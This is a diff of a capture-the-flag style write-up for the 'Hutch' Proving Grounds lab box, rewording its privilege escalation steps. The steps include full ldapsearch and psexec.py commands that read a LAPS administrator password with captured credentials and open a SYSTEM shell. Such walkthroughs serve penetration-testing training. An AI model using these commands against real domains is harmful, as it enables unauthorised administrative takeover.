Bsal13/Offensive-Security-Proving-Grounds-Boxes/Hutch (Intermediate) Windows Active Directory Box.md

 ## Privilege Escalation vector
-## Locate administrator password by performing an ldapsearch query and login as administrator utilizing psexec.py
+Retrieved administrator password by performing an ldapsearch query which led to logging in as administrator utilizing psexec.py

-#### -I attempt to query LDAP for the local administrator password by typing "ldapsearch -x -H 'ldap://192.168.142.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd" and find administrators password is ",G4$4Yk-2n&x(]":
+To escalate privileges, an LDAP search was performed to retrieve the local administrator password: ldapsearch -x -H 'ldap://192.168.142.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd.
+The search revealed the administrator password as ",G4$4Yk-2n&x(]".

 ![](Images/Pasted%20image%2020221019012818.png)

-#### - Now that I have valid administrator credentials I login with psexec.py by typing "python psexec.py hutch.offsec/administrator:',G4$4Yk-2n&x(]'@192.168.142.122" and receive a shell as nt authority\system:
+Using the obtained administrator credentials, privilege escalation was achieved by logging in with psexec.py as the administrator: python psexec.py hutch.offsec/administrator:',G4$4Yk-2n&x(]'@192.168.142.122.
+This provided a shell running as nt authority\system.

 ![](Images/Pasted%20image%2020221019012951.png)